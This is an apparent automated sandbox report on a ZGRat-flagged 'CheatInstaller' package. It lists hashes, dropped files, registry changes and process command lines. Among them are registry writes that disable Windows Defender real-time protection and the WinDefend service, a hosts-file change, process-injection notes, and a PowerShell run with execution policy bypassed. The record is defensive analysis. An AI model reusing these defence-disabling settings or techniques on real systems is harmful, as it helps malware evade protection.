memory/3472-7703-0x000001A36D180000-0x000001A36D8BB000-memory.dmp
memory/5552-7707-0x0000000004D30000-0x0000000004FA0000-memory.dmp
memory/3472-7706-0x000001A36D180000-0x000001A36D8BB000-memory.dmp
memory/5368-7708-0x00000000057D0000-0x0000000005A4F000-memory.dmp
memory/5552-7714-0x0000000004D30000-0x0000000004FA0000-memory.dmp
memory/5368-7713-0x00000000057D0000-0x0000000005A4F000-memory.dmp
memory/3472-7719-0x000001A36D180000-0x000001A36D8BB000-memory.dmp
memory/5552-7720-0x0000000004D30000-0x0000000004FA0000-memory.dmp
memory/5368-7718-0x00000000057D0000-0x0000000005A4F000-memory.dmp
memory/3472-7712-0x000001A36D180000-0x000001A36D8BB000-memory.dmp
memory/5552-7702-0x0000000004D30000-0x0000000004FA0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\node_modules\strip-ansi\package.json
| MD5 | 6a0c65b4bd6c6b9cd068e2232eef50d9 |
| SHA1 | 892d549c672831716abe655f087946d2644f2852 |
| SHA256 | 0130850b9da0584f54cc20d3dab6365c807e9436ac78e016d5009efa99bd0530 |
| SHA512 | 724a1e498671494c22ba929060058b5539acd34b839d263c9058a07333cda543d5c77435a0a6f13f76adb2f32bb93fa2683f8089245dbc4c8815bde17168ebb7 |
C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\node_modules\strip-ansi\index.js
| MD5 | d2f059d0b9cfa91f1e899a4632d33da8 |
| SHA1 | ac06aab8c4ef70f9d2c18bbd0b2eb5ef0bb7c900 |
| SHA256 | bf37cd692bf030c2ec270945bc26aa8b19ad379fa5916f12304758f709ab0978 |
| SHA512 | 0685ed108c20c84b3c0d4bf181318bf3f3ad6602de1b5bb71dc6a8d377575e974c42bcc14f5d72a244f06044bce8f81005c57ec2d246a513b6f196700a5010c2 |
C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\node_modules\string-width\package.json
| MD5 | 9546c3afdec6c3ee9a51fbb9d614976f |
| SHA1 | a5306c15bba6cb123d9f061ca85eb56576c6638f |
| SHA256 | 6457a02418f004fe5d3fbbb19c7cbcc1450a8b887ff9a471dc6985ac83a48d36 |
| SHA512 | 3e43d7d656ee1029abd5dc6da827db81907d99d60031111d747eb9b7354145e0262c113a061fe343d4020a3cba41fafc620d7d9f27cd2d8035a2af32b7eeab9e |
C:\Users\Admin\AppData\Local\Temp\7zS46DC.tmp\node_modules\string-width\index.js
| MD5 | 570a2a45ed08d4c933084c566cfa9766 |
| SHA1 | e2b122265bccc50b8965d79b07a559a51e74747c |
| SHA256 | ed69ea4f757130e46dc48a0cc31beb6257e61a31c70936d82b8a3f02ffd64df5 |
| SHA512 | f0ad29fc99cb379e7bcb2995c18a55da9ada9852456e8da752ecc679e0caf3d0f989d558ba5f041bb02bc02fb88a8c2f8ae7f1a524a2a041b54ec5637c71c121 |
memory/5368-7264-0x00000000057D0000-0x0000000005A4F000-memory.dmp
Analysis: behavioral4
Detonation Overview
Submitted
2024-03-18 14:42
Reported
2024-03-18 14:48
Platform
win11-20240214-en
Max time kernel
300s
Max time network
292s
Command Line
Signatures
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 7556 created 3272 | N/A | C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe | C:\Windows\Explorer.EXE |
| PID 7556 created 3272 | N/A | C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe | C:\Windows\Explorer.EXE |
| PID 7556 created 3272 | N/A | C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe | C:\Windows\Explorer.EXE |
ZGRat
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe | N/A |
Stops running service(s)
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe | N/A |
| N/A | N/A | C:\Windows\Installer\MSIAF1C.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe | N/A |
| N/A | N/A | C:\Windows\Installer\MSIE2C0.tmp | N/A |
| N/A | N/A | C:\Windows\Installer\MSIE2C1.tmp | N/A |
| N/A | N/A | C:\Windows\Installer\MSIE2C2.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\Narsil.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe | N/A |
Loads dropped DLL
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 | C:\Windows\syswow64\MsiExec.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content | C:\Windows\syswow64\MsiExec.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 | C:\Windows\syswow64\MsiExec.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft | C:\Windows\syswow64\MsiExec.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache | C:\Windows\syswow64\MsiExec.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData | C:\Windows\syswow64\MsiExec.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1040 set thread context of 7556 | N/A | C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe | C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe |
| PID 7556 set thread context of 6348 | N/A | C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe | C:\Windows\System32\svchost.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_wavenet_r9y9.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_piano.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\wavegan_birds.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_wavenet_ibab.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\general_log.frm | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_drums.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\specgan_timit.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_tatum.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\wavegan_drums.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\event.csv | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\gl_piano.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\gl_sc09.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\gl_timit.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\specgan_piano.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_wavegan_ps2.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\wavegan_sc09.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\lang_fre.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\db.MYI | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\help_topic.frm | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\gl_birds.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\gl_drums.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_specgan.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_birds.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\specgan_drums.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\db.frm | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\help_relation.MYI | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_sc09.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_parametric.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\specgan_sc09.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_wavegan_pp.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\wavegan_timit.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\lang_ita.txt | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\slow_log.frm | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\real_timit.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\specgan_birds.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_wavegan_ps4.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\wavegan_piano.wav | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Program Files (x86)\OpenSource\CheatInstaller\Audio\quant_samplernn.wav | C:\Windows\system32\msiexec.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Installer\MSI90F8.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI9439.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI9119.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SystemTemp\~DF20C2E84709B48809.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI9D66.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\e578f01.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\SourceHash{AA26797C-3E2C-42C1-A832-A687DE957A1C} | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SystemTemp\~DF7D09BE57B9761F46.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI9D05.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI9DA6.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI9F00.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIAF1D.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI9059.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI9E25.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIE302.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI90D7.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI9E14.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIABB0.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI90E8.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI9419.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI9D46.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI9F11.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e578f05.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIAF1C.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIE2C1.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SystemTemp\~DF4F7892B5D23458AA.TMP | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e578f01.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI9109.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI9D35.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIE2C2.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI9408.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\inprogressinstallinfo.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI9CE5.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIE2C0.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\SystemTemp\~DF1E654603172A86B7.TMP | C:\Windows\system32\msiexec.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
Enumerates physical storage devices
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Caphyon | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer\TXT Updater Config | C:\Windows\syswow64\MsiExec.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22 | C:\Windows\system32\msiexec.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer\TXT Updater Config | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer\TXT Updater Config\{AA26797C-3E2C-42C1-A832-A687DE957A1C} | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer | C:\Windows\syswow64\MsiExec.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer\TXT Updater Config\{AA26797C-3E2C-42C1-A832-A687DE957A1C}\C:\Users\Admin\AppData\Local\Temp\ferght6fj54f.txt = "*" | C:\Windows\syswow64\MsiExec.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software | C:\Windows\syswow64\MsiExec.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\23 | C:\Windows\system32\msiexec.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Caphyon | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\syswow64\MsiExec.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\syswow64\MsiExec.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E | C:\Windows\system32\msiexec.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Caphyon\Advanced Installer\TXT Updater Config\{AA26797C-3E2C-42C1-A832-A687DE957A1C} | C:\Windows\syswow64\MsiExec.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\ProductName = "CheatInstaller" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\Language = "1033" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\Version = "35651584" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\DeploymentFlags = "3" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Roaming\\OpenSource\\CheatInstaller 2.32\\install\\E957A1C\\" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\Media | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\PackageCode = "9860C08E1459A8B42A7F241C2213136F" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\FA1A2714FC38171429580C777D5579A9 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\FA1A2714FC38171429580C777D5579A9\C79762AAC2E31C248A236A78ED59A7C1 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\PackageName = "YTtSTCHEAT.msi" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\Media\DiskPrompt = "[1]" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\Assignment = "1" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\InstanceType = "0" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\AuthorizedLUAApp = "0" | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\Net | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\Media\1 = ";" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\Clients = 3a0000000000 | C:\Windows\system32\msiexec.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\C79762AAC2E31C248A236A78ED59A7C1 | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\C79762AAC2E31C248A236A78ED59A7C1\MainFeature | C:\Windows\system32\msiexec.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\AdvertiseFlags = "388" | C:\Windows\system32\msiexec.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C79762AAC2E31C248A236A78ED59A7C1\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Roaming\\OpenSource\\CheatInstaller 2.32\\install\\E957A1C\\" | C:\Windows\system32\msiexec.exe | N/A |
Runs ping.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\RUN.exe
"C:\Users\Admin\AppData\Local\Temp\RUN.exe"
C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe
.\Install_YTTCHTs.exe
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 0B760438556A7DE397489DF12687E02A C
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\YTtSTCHEAT.msi" /quiet AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\Install_YTTCHTs.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\7zS6DFC.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1710532431 " ALLUSERS="1"
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 283A16B661ED63194EE759B353549ACC
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss9156.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi9143.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr9144.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr9145.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\progressgood.bat" "
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 3370C58241206171484FCCE0EC758105 E Global\MSI0000
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1 -n 2
C:\Windows\SysWOW64\PING.EXE
